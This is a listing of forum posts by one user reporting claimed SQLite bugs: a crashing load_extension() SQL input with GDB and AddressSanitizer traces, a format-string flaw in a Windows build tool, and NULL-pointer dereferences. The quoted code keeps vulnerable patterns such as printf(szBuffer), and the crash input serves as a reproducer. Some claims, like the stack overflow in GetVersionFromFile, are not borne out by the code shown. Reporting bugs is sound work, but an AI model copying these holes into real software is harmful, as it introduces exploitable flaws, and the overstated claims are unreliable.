
7 forum posts by user salmonx

2021-06-15
11:38 Edit: bug A stack buffer overflow vulnerability was discovered in SQLite 3.36.0 (artifact: d036c2b547 user: salmonx)

A stack buffer overflow vulnerability was discovered in SQLite 3.36.0. The backtrace below places the crash inside the dynamic loader (open_path in dl-load.c) while load_extension() hands dlopen() a very long, randomly generated file name; AddressSanitizer reports it as a stack-overflow.

toor@ubuntu:~/work/fuzz/sqlite$ cat crash1 
create table t1(one int);
insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));
select  date( randomblob(one)) from t1;
toor@ubuntu:~/work/fuzz/sqlite$ ./sqlite3 < crash1
Segmentation fault (core dumped)  // tmp/core-61197-1623378831 

GDB Backtrace

toor@ubuntu:~/work/fuzz/sqlite$ gdb ./sqlite3 

Reading symbols from ./sqlite3...done.
(gdb) core-file /tmp/core-61197-1623378831 
[New LWP 61197]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `./sqlite3'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  open_path (
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., namelen=namelen@entry=133333325, mode=mode@entry=-1879047934, 
    sps=sps@entry=0x7f4dbdc16920 <rtld_search_dirs>, realname=realname@entry=0x7fff2ebf0790, 
    fbp=fbp@entry=0x7fff2ebf07a0, loader=0x7f4dbdc18170, whatcode=64, found_other_class=0x7fff2ebf078f)
    at dl-load.c:2034
2034	dl-load.c: No such file or directory.
(gdb) 
(gdb) bt
#0  open_path (
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., namelen=namelen@entry=133333325, mode=mode@entry=-1879047934, 
    sps=sps@entry=0x7f4dbdc16920 <rtld_search_dirs>, realname=realname@entry=0x7fff2ebf0790, 
    fbp=fbp@entry=0x7fff2ebf07a0, loader=0x7f4dbdc18170, whatcode=64, found_other_class=0x7fff2ebf078f)
    at dl-load.c:2034
#1  0x00007f4dbd9f660f in _dl_map_object (loader=loader@entry=0x7f4dbdc18170, 
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., type=type@entry=2, trace_mode=trace_mode@entry=0, mode=mode@entry=-1879047934, nsid=<optimized out>)
    at dl-load.c:2381
#2  0x00007f4dbda02084 in dl_open_worker (a=a@entry=0x7fff2ebf0d10) at dl-open.c:235
#3  0x00007f4dbcd851ef in __GI__dl_catch_exception (exception=exception@entry=0x7fff2ebf0cf0, 
    operate=operate@entry=0x7f4dbda01f60 <dl_open_worker>, args=args@entry=0x7fff2ebf0d10)
    at dl-error-skeleton.c:196
#4  0x00007f4dbda0196a in _dl_open (
    file=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., mode=-2147483390, caller_dlopen=0x5593264fe1f4 <sqlite3_load_extension+628>, nsid=<optimized out>, argc=1, 
    argv=<optimized out>, env=0x7fff2ebf29c8) at dl-open.c:605
#5  0x00007f4dbd22ef96 in dlopen_doit (a=a@entry=0x7fff2ebf0f40) at dlopen.c:66
#6  0x00007f4dbcd851ef in __GI__dl_catch_exception (exception=exception@entry=0x7fff2ebf0ee0, 
    operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, args=args@entry=0x7fff2ebf0f40) at dl-error-skeleton.c:196
#7  0x00007f4dbcd8527f in __GI__dl_catch_error (objname=objname@entry=0x55932787a8b0, 
    errstring=errstring@entry=0x55932787a8b8, mallocedp=mallocedp@entry=0x55932787a8a8, 
    operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, args=args@entry=0x7fff2ebf0f40) at dl-error-skeleton.c:215
#8  0x00007f4dbd22f745 in _dlerror_run (operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, 
    args=args@entry=0x7fff2ebf0f40) at dlerror.c:162
#9  0x00007f4dbd22f051 in __dlopen (file=<optimized out>, mode=<optimized out>) at dlopen.c:87
#10 0x00005593264fe1f4 in sqlite3OsDlOpen (
    zPath=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., pVfs=0x559326a4e3c0 <aVfs.18009>) at sqlite3.c:23652
#11 sqlite3LoadExtension (pzErrMsg=0x7fff2ebf0ff0, zProc=0x0, 
    zFile=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., db=0x559327866c88) at sqlite3.c:61882
#12 sqlite3_load_extension (db=db@entry=0x559327866c88, 
    zFile=zFile@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433---Type <return> t---Type <return> to continue, or q <return> to quit---
533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., 
    zProc=0x0, pzErrMsg=pzErrMsg@entry=0x7fff2ebf0ff0) at sqlite3.c:61984
#13 0x000055932650013a in loadExt (context=0x559327876748, argc=1, argv=0x559327876778) at sqlite3.c:120743
#14 0x000055932661fd2d in sqlite3VdbeExec (p=p@entry=0x5593278742e8) at sqlite3.c:94427
#15 0x0000559326646b81 in sqlite3Step (p=0x5593278742e8) at sqlite3.c:84821
#16 sqlite3_step (pStmt=<optimized out>) at sqlite3.c:19342
#17 0x000055932627161d in exec_prepared_stmt (pStmt=0x5593278742e8, pArg=0x7fff2ebf16a0) at shell.c:14156
#18 shell_exec (pArg=0x7fff2ebf16a0, zSql=<optimized out>, pzErrMsg=0x7fff2ebf14a8) at shell.c:14465
#19 0x0000559326278b48 in runOneSqlLine (p=0x7fff2ebf16a0, 
    zSql=0x559327866bf0 "insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));", 
    in=0x7f4dbd009a00 <_IO_2_1_stdin_>, startline=2) at shell.c:21411
#20 0x00005593262a75a7 in process_input (p=0x7fff2ebf16a0) at shell.c:21511
#21 0x00005593261d4b2e in main (argc=<optimized out>, argv=<optimized out>) at shell.c:22320

AddressSanitizer: stack-overflow

toor@ubuntu:~/work/fuzz/poc/sqlite-snapshot-202106031851$ ./sqlite3 
SQLite version 3.36.0 2021-06-03 18:51:51
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));
Error: no such table: t1
sqlite> create table t1(one int);
insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));sqlite> 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==56360==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdd1242fb8 (pc 0x7f8104b932f6 bp 0x7ffdd916b290 sp 0x7ffdd1242fc0 T0)
    #0 0x7f8104b932f5  (/lib64/ld-linux-x86-64.so.2+0x62f5)
    #1 0x7f8104b9660e  (/lib64/ld-linux-x86-64.so.2+0x960e)
    #2 0x7f8104ba2083  (/lib64/ld-linux-x86-64.so.2+0x15083)
    #3 0x7f8103b051ee in _dl_catch_exception /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:196
    #4 0x7f8104ba1969  (/lib64/ld-linux-x86-64.so.2+0x14969)
    #5 0x7f81043cef95 in dlopen_doit /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlopen.c:66
    #6 0x7f8103b051ee in _dl_catch_exception /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:196
    #7 0x7f8103b0527e in _dl_catch_error /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:215
    #8 0x7f81043cf744 in _dlerror_run /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlerror.c:162
    #9 0x7f81043cf050 in dlopen /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlopen.c:87
    #10 0x46c0b1 in dlopen /local/mnt/workspace/bcain_clang_bcain-ubuntu_23113/llvm/utils/release/final/llvm.src/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:6033:15
    #11 0x5b2b41 in sqlite3OsDlOpen /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:23652:10
    #12 0x5b2b41 in sqlite3LoadExtension /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:127418:12
    #13 0x5b2b41 in sqlite3_load_extension /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:127520:8
    #14 0x9a157b in loadExt /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:120743:16
    #15 0x66f9b9 in sqlite3VdbeExec /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:94427:3
    #16 0x5763c4 in sqlite3Step /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:84821:10
    #17 0x5763c4 in sqlite3_step /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:84878:16
    #18 0x5545b4 in exec_prepared_stmt /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:14156:8
    #19 0x5087dc in shell_exec /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:14465:7
    #20 0x559732 in runOneSqlLine /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:21411:8
    #21 0x50dc6c in process_input /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:21511:17
    #22 0x4e082e in main /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:22312:12
    #23 0x7f81039bfbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #24 0x41c049 in _start (/home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3+0x41c049)

SUMMARY: AddressSanitizer: stack-overflow (/lib64/ld-linux-x86-64.so.2+0x62f5) 
==56360==ABORTING
11:34 Reply: A stack overflow vulnerability in SQLite nmakehelp.c allows arbitrary code execution via a crafted file (artifact: 64e9895d18 user: salmonx)

Thanks for your timely response. But couldn't you delete the vulnerable code, or fix it, to make SQLite more secure? :)

11:30 Edit: A format string vulnerability in tool used to help build SQLite's TCL extension on Windows (artifact: 7f0beca979 user: salmonx)

The 'printf' call in SubstituteFile receives its format string as an argument, but that format string originates from argv[3], which is controlled by the user.

/*
 * Copy `filename` to stdout line by line, replacing every key from the
 * substitution list (substPtr) with its value.  The declarations of fp,
 * szBuffer, cbBuffer, szCopy and substPtr are elided ("...") in this excerpt.
 */
static int
SubstituteFile(
    const char *substitutions,
    const char *filename)
{
    ...

    fp = fopen(filename, "rt");
    if (fp != NULL) {
    	
    	while (fgets(szBuffer, cbBuffer, fp) != NULL) {
    	    list_item_t *p = NULL;
    	    for (p = substPtr; p != NULL; p = p->nextPtr) {
    		char *m = strstr(szBuffer, p->key);
    		if (m) {
    		    char *cp, *op, *sp;
    		    /*
    		     * Rebuild the line in szCopy: prefix, replacement value, suffix.
    		     * None of the three copy loops is bounded by the size of szCopy
    		     * (declared in the elided part), so a value longer than its key
    		     * can run past the end of szCopy.  NOTE(review): confirm that
    		     * szCopy is sized for the longest substituted line.
    		     */
    		    cp = szCopy;
    		    op = szBuffer;
    		    while (op != m) *cp++ = *op++;
    		    sp = p->value;
    		    while (sp && *sp) *cp++ = *sp++;
    		    op += strlen(p->key);
    		    while (*op) *cp++ = *op++;
    		    *cp = 0;
    		    /*
    		     * Copies sizeof(szCopy) bytes into szBuffer, which is only safe if
    		     * sizeof(szBuffer) >= sizeof(szCopy).  NOTE(review): verify against
    		     * the elided declarations.
    		     */
    		    memcpy(szBuffer, szCopy, sizeof(szCopy));
    		}
    	    }
    	    /*
    	     * Vulnerability: szBuffer is file content used directly as the format
    	     * string, so any '%' in the input is interpreted as a conversion
    	     * directive.  Print it as data instead: fputs(szBuffer, stdout) or
    	     * printf("%s", szBuffer).
    	     */
    	    printf(szBuffer); // Vulnerability
    	}
    	
    	list_free(&substPtr);
    }
    /*
     * Runs even when fopen() failed above and fp is NULL; fclose(NULL) is
     * undefined behaviour.  The call belongs inside the if (fp != NULL) block.
     */
    fclose(fp);
    return 0;
}
07:18 Post: A stack overflow vulnerability in SQLite nmakehelp.c allows arbitrary code execution via a crafted file (artifact: 4a3625e733 user: salmonx)

The local variable 'szBuffer' in GetVersionFromFile can be exploited by a local attacker for arbitrary code execution.

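/*
 * Scan `filename` line by line for the first line containing `match` and
 * return the version token that follows it: the text starting at the first
 * digit after the match and ending at the first character that is neither
 * alphanumeric nor '.'.
 *
 * Returns a pointer into a static buffer that is overwritten by the next
 * call (not thread-safe), or NULL when the file cannot be opened or no line
 * contains `match`.
 */
static const char *
GetVersionFromFile(
    const char *filename,
    const char *match)
{
    size_t cbBuffer = 100;
    static char szBuffer[100];
    char *szResult = NULL;
    FILE *fp = fopen(filename, "rt");

    if (fp != NULL) {
	/*
	 * Read data until we see our match string.  fgets() never writes
	 * more than cbBuffer bytes, so szBuffer stays NUL-terminated.
	 */

	while (fgets(szBuffer, cbBuffer, fp) != NULL) {
	    char *p, *q;

	    p = strstr(szBuffer, match);
	    if (p != NULL) {
		/*
		 * Skip to first digit.  The unsigned char cast keeps the
		 * <ctype.h> classifiers well-defined for bytes >= 0x80 on
		 * platforms where plain char is signed.
		 */

		while (*p && !isdigit((unsigned char)*p)) {
		    ++p;
		}

		/*
		 * Find the end of the version token.
		 */

		q = p;
		while (*q && (isalnum((unsigned char)*q) || *q == '.')) {
		    ++q;
		}

		/*
		 * p and q both point inside szBuffer, so source and
		 * destination overlap: memmove() is required here, memcpy()
		 * on overlapping regions is undefined behaviour.  The token
		 * is never longer than the line already in szBuffer, so the
		 * move and the terminator always stay within the buffer.
		 */
		memmove(szBuffer, p, (size_t)(q - p));
		szBuffer[q - p] = '\0';
		szResult = szBuffer;
		break;
	    }
	}
	fclose(fp);
    }
    return szResult;
}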
07:04 Post: A format string vulnerability in tool used to help build SQLite's TCL extension on Windows (artifact: 7dcd751996 user: salmonx)

The 'printf' call in SubstituteFile receives its format string as an argument, but that format string originates from argv[3], which is controlled by the user.

/*
 * Copy `filename` to stdout line by line, replacing every key from the
 * substitution list (substPtr) with its value.  The declarations of fp,
 * szBuffer, cbBuffer, szCopy and substPtr are elided ("...") in this excerpt.
 */
static int
SubstituteFile(
    const char *substitutions,
    const char *filename)
{
    ...

    fp = fopen(filename, "rt");
    if (fp != NULL) {
    	
    	while (fgets(szBuffer, cbBuffer, fp) != NULL) {
    	    list_item_t *p = NULL;
    	    for (p = substPtr; p != NULL; p = p->nextPtr) {
    		char *m = strstr(szBuffer, p->key);
    		if (m) {
    		    char *cp, *op, *sp;
    		    /*
    		     * Rebuild the line in szCopy: prefix, replacement value, suffix.
    		     * None of the three copy loops is bounded by the size of szCopy
    		     * (declared in the elided part), so a value longer than its key
    		     * can run past the end of szCopy.  NOTE(review): confirm that
    		     * szCopy is sized for the longest substituted line.
    		     */
    		    cp = szCopy;
    		    op = szBuffer;
    		    while (op != m) *cp++ = *op++;
    		    sp = p->value;
    		    while (sp && *sp) *cp++ = *sp++;
    		    op += strlen(p->key);
    		    while (*op) *cp++ = *op++;
    		    *cp = 0;
    		    /*
    		     * Copies sizeof(szCopy) bytes into szBuffer, which is only safe if
    		     * sizeof(szBuffer) >= sizeof(szCopy).  NOTE(review): verify against
    		     * the elided declarations.
    		     */
    		    memcpy(szBuffer, szCopy, sizeof(szCopy));
    		}
    	    }
    	    /*
    	     * Vulnerability: szBuffer is file content used directly as the format
    	     * string, so any '%' in the input is interpreted as a conversion
    	     * directive.  Print it as data instead: fputs(szBuffer, stdout) or
    	     * printf("%s", szBuffer).
    	     */
    	    printf(szBuffer); // Vulnerability
    	}
    	
    	list_free(&substPtr);
    }
    /*
     * Runs even when fopen() failed above and fp is NULL; fclose(NULL) is
     * undefined behaviour.  The call belongs inside the if (fp != NULL) block.
     */
    fclose(fp);
    return 0;
}
04:00 Post: Bug A NULL pointer dereference bug was discovered in SQLite (artifact: 48d46020bb user: salmonx)

NULL Pointer (sqlite3_vfs_find)

/* Locate a registered VFS by name; a NULL zVfs selects the default VFS.
** Most of the body is elided ("...") in this excerpt.
*/
SQLITE_API sqlite3_vfs *sqlite3_vfs_find(const char *zVfs){
  ...
#ifndef SQLITE_OMIT_AUTOINIT
  int rc = sqlite3_initialize();
  if( rc ) return 0;            // NULL Pointer: when library initialization
                                // fails this returns 0 instead of a VFS, so
                                // every caller must NULL-check the result
                                // before dereferencing it.
#endif
  ...
  return pVfs;
}

NULL Pointer Dereference

sqlite3MemdbInit

/* NOTE(review): presumably registers an in-memory VFS layered on top of the
** default VFS; only the first two lines of the body are shown here ("...").
*/
SQLITE_PRIVATE int sqlite3MemdbInit(void){
  sqlite3_vfs *pLower = sqlite3_vfs_find(0);
  unsigned int sz = pLower->szOsFile; // NULL Pointer Dereference: pLower is 0
                                      // when sqlite3_vfs_find() fails (see its
                                      // early return), so guard it with
                                      // "if( pLower==0 ) return SQLITE_ERROR;"
                                      // before this read.
  ...
}

sqlite3_appendvfs_init

/* Extension entry point that sets up apnd_vfs as a wrapper around the default
** VFS returned by sqlite3_vfs_find(0).  Parts of the body are elided ("...").
*/
int sqlite3_appendvfs_init(
  sqlite3 *db, 
  char **pzErrMsg, 
  const sqlite3_api_routines *pApi
){
  ...
  pOrig = sqlite3_vfs_find(0);
  apnd_vfs.iVersion = pOrig->iVersion; // NULL Pointer Dereference: pOrig is 0
                                       // when sqlite3_vfs_find() fails; add
                                       // "if( pOrig==0 ) return SQLITE_ERROR;"
                                       // before the reads on this and the
                                       // szOsFile line below.
  apnd_vfs.pAppData = pOrig;
  apnd_vfs.szOsFile = pOrig->szOsFile + sizeof(ApndFile); //NULL Pointer Dereference (same pOrig)
  ...
}

timeOfDay

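/* Return the current wall-clock time in milliseconds, as reported by the
** default VFS.  The VFS pointer is looked up once and cached in a static.
**
** If no default VFS is available (sqlite3_vfs_find(0) returns 0, which it
** does when library initialization fails) this returns 0 instead of
** dereferencing a NULL pointer; callers should treat 0 as "time unknown".
*/
static sqlite3_int64 timeOfDay(void){
  static sqlite3_vfs *clockVfs = 0;
  sqlite3_int64 t;
  if( clockVfs==0 ) clockVfs = sqlite3_vfs_find(0);
  /* Guard the cached lookup: the VFS may legitimately be missing. */
  if( clockVfs==0 ) return 0;
  if( clockVfs->iVersion>=2 && clockVfs->xCurrentTimeInt64!=0 ){
    clockVfs->xCurrentTimeInt64(clockVfs, &t);
  }else{
    double r;
    clockVfs->xCurrentTime(clockVfs, &r);
    /* Older VFS interface reports days; 86400000 ms per day. */
    t = (sqlite3_int64)(r*86400000.0);
  }
  return t;
}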
2021-06-11
03:37 Post: bug A stack buffer overflow vulnerability was discovered in SQLite 3.36.0 (artifact: 08a0d6d9bf user: salmonx)

A stack buffer overflow vulnerability was discovered in SQLite 3.36.0. The backtrace below places the crash inside the dynamic loader (open_path in dl-load.c) while load_extension() hands dlopen() a very long, randomly generated file name; AddressSanitizer reports it as a stack-overflow.

toor@ubuntu:~/work/fuzz/sqlite$ cat crash1 
create table t1(one int);
insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));
select  date( randomblob(one)) from t1;
toor@ubuntu:~/work/fuzz/sqlite$ ./sqlite3 < crash1
Segmentation fault (core dumped)  // tmp/core-61197-1623378831 

GDB Backtrace

toor@ubuntu:~/work/fuzz/sqlite$ gdb ./sqlite3 

Reading symbols from ./sqlite3...done.
(gdb) core-file /tmp/core-61197-1623378831 
[New LWP 61197]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `./sqlite3'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  open_path (
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., namelen=namelen@entry=133333325, mode=mode@entry=-1879047934, 
    sps=sps@entry=0x7f4dbdc16920 <rtld_search_dirs>, realname=realname@entry=0x7fff2ebf0790, 
    fbp=fbp@entry=0x7fff2ebf07a0, loader=0x7f4dbdc18170, whatcode=64, found_other_class=0x7fff2ebf078f)
    at dl-load.c:2034
2034	dl-load.c: No such file or directory.
(gdb) 
(gdb) bt
#0  open_path (
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., namelen=namelen@entry=133333325, mode=mode@entry=-1879047934, 
    sps=sps@entry=0x7f4dbdc16920 <rtld_search_dirs>, realname=realname@entry=0x7fff2ebf0790, 
    fbp=fbp@entry=0x7fff2ebf07a0, loader=0x7f4dbdc18170, whatcode=64, found_other_class=0x7fff2ebf078f)
    at dl-load.c:2034
#1  0x00007f4dbd9f660f in _dl_map_object (loader=loader@entry=0x7f4dbdc18170, 
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., type=type@entry=2, trace_mode=trace_mode@entry=0, mode=mode@entry=-1879047934, nsid=<optimized out>)
    at dl-load.c:2381
#2  0x00007f4dbda02084 in dl_open_worker (a=a@entry=0x7fff2ebf0d10) at dl-open.c:235
#3  0x00007f4dbcd851ef in __GI__dl_catch_exception (exception=exception@entry=0x7fff2ebf0cf0, 
    operate=operate@entry=0x7f4dbda01f60 <dl_open_worker>, args=args@entry=0x7fff2ebf0d10)
    at dl-error-skeleton.c:196
#4  0x00007f4dbda0196a in _dl_open (
    file=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., mode=-2147483390, caller_dlopen=0x5593264fe1f4 <sqlite3_load_extension+628>, nsid=<optimized out>, argc=1, 
    argv=<optimized out>, env=0x7fff2ebf29c8) at dl-open.c:605
#5  0x00007f4dbd22ef96 in dlopen_doit (a=a@entry=0x7fff2ebf0f40) at dlopen.c:66
#6  0x00007f4dbcd851ef in __GI__dl_catch_exception (exception=exception@entry=0x7fff2ebf0ee0, 
    operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, args=args@entry=0x7fff2ebf0f40) at dl-error-skeleton.c:196
#7  0x00007f4dbcd8527f in __GI__dl_catch_error (objname=objname@entry=0x55932787a8b0, 
    errstring=errstring@entry=0x55932787a8b8, mallocedp=mallocedp@entry=0x55932787a8a8, 
    operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, args=args@entry=0x7fff2ebf0f40) at dl-error-skeleton.c:215
#8  0x00007f4dbd22f745 in _dlerror_run (operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, 
    args=args@entry=0x7fff2ebf0f40) at dlerror.c:162
#9  0x00007f4dbd22f051 in __dlopen (file=<optimized out>, mode=<optimized out>) at dlopen.c:87
#10 0x00005593264fe1f4 in sqlite3OsDlOpen (
    zPath=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., pVfs=0x559326a4e3c0 <aVfs.18009>) at sqlite3.c:23652
#11 sqlite3LoadExtension (pzErrMsg=0x7fff2ebf0ff0, zProc=0x0, 
    zFile=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., db=0x559327866c88) at sqlite3.c:61882
#12 sqlite3_load_extension (db=db@entry=0x559327866c88, 
    zFile=zFile@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433---Type <return> t---Type <return> to continue, or q <return> to quit---
533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., 
    zProc=0x0, pzErrMsg=pzErrMsg@entry=0x7fff2ebf0ff0) at sqlite3.c:61984
#13 0x000055932650013a in loadExt (context=0x559327876748, argc=1, argv=0x559327876778) at sqlite3.c:120743
#14 0x000055932661fd2d in sqlite3VdbeExec (p=p@entry=0x5593278742e8) at sqlite3.c:94427
#15 0x0000559326646b81 in sqlite3Step (p=0x5593278742e8) at sqlite3.c:84821
#16 sqlite3_step (pStmt=<optimized out>) at sqlite3.c:19342
#17 0x000055932627161d in exec_prepared_stmt (pStmt=0x5593278742e8, pArg=0x7fff2ebf16a0) at shell.c:14156
#18 shell_exec (pArg=0x7fff2ebf16a0, zSql=<optimized out>, pzErrMsg=0x7fff2ebf14a8) at shell.c:14465
#19 0x0000559326278b48 in runOneSqlLine (p=0x7fff2ebf16a0, 
    zSql=0x559327866bf0 "insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));", 
    in=0x7f4dbd009a00 <_IO_2_1_stdin_>, startline=2) at shell.c:21411
#20 0x00005593262a75a7 in process_input (p=0x7fff2ebf16a0) at shell.c:21511
#21 0x00005593261d4b2e in main (argc=<optimized out>, argv=<optimized out>) at shell.c:22320

AddressSanitizer: stack-overflow

toor@ubuntu:~/work/fuzz/poc/sqlite-snapshot-202106031851$ ./sqlite3 
SQLite version 3.36.0 2021-06-03 18:51:51
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));
Error: no such table: t1
sqlite> create table t1(one int);
insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));sqlite> 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==56360==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdd1242fb8 (pc 0x7f8104b932f6 bp 0x7ffdd916b290 sp 0x7ffdd1242fc0 T0)
    #0 0x7f8104b932f5  (/lib64/ld-linux-x86-64.so.2+0x62f5)
    #1 0x7f8104b9660e  (/lib64/ld-linux-x86-64.so.2+0x960e)
    #2 0x7f8104ba2083  (/lib64/ld-linux-x86-64.so.2+0x15083)
    #3 0x7f8103b051ee in _dl_catch_exception /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:196
    #4 0x7f8104ba1969  (/lib64/ld-linux-x86-64.so.2+0x14969)
    #5 0x7f81043cef95 in dlopen_doit /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlopen.c:66
    #6 0x7f8103b051ee in _dl_catch_exception /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:196
    #7 0x7f8103b0527e in _dl_catch_error /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:215
    #8 0x7f81043cf744 in _dlerror_run /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlerror.c:162
    #9 0x7f81043cf050 in dlopen /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlopen.c:87
    #10 0x46c0b1 in dlopen /local/mnt/workspace/bcain_clang_bcain-ubuntu_23113/llvm/utils/release/final/llvm.src/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:6033:15
    #11 0x5b2b41 in sqlite3OsDlOpen /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:23652:10
    #12 0x5b2b41 in sqlite3LoadExtension /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:127418:12
    #13 0x5b2b41 in sqlite3_load_extension /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:127520:8
    #14 0x9a157b in loadExt /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:120743:16
    #15 0x66f9b9 in sqlite3VdbeExec /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:94427:3
    #16 0x5763c4 in sqlite3Step /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:84821:10
    #17 0x5763c4 in sqlite3_step /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:84878:16
    #18 0x5545b4 in exec_prepared_stmt /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:14156:8
    #19 0x5087dc in shell_exec /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:14465:7
    #20 0x559732 in runOneSqlLine /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:21411:8
    #21 0x50dc6c in process_input /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:21511:17
    #22 0x4e082e in main /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:22312:12
    #23 0x7f81039bfbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #24 0x41c049 in _start (/home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3+0x41c049)

SUMMARY: AddressSanitizer: stack-overflow (/lib64/ld-linux-x86-64.so.2+0x62f5) 
==56360==ABORTING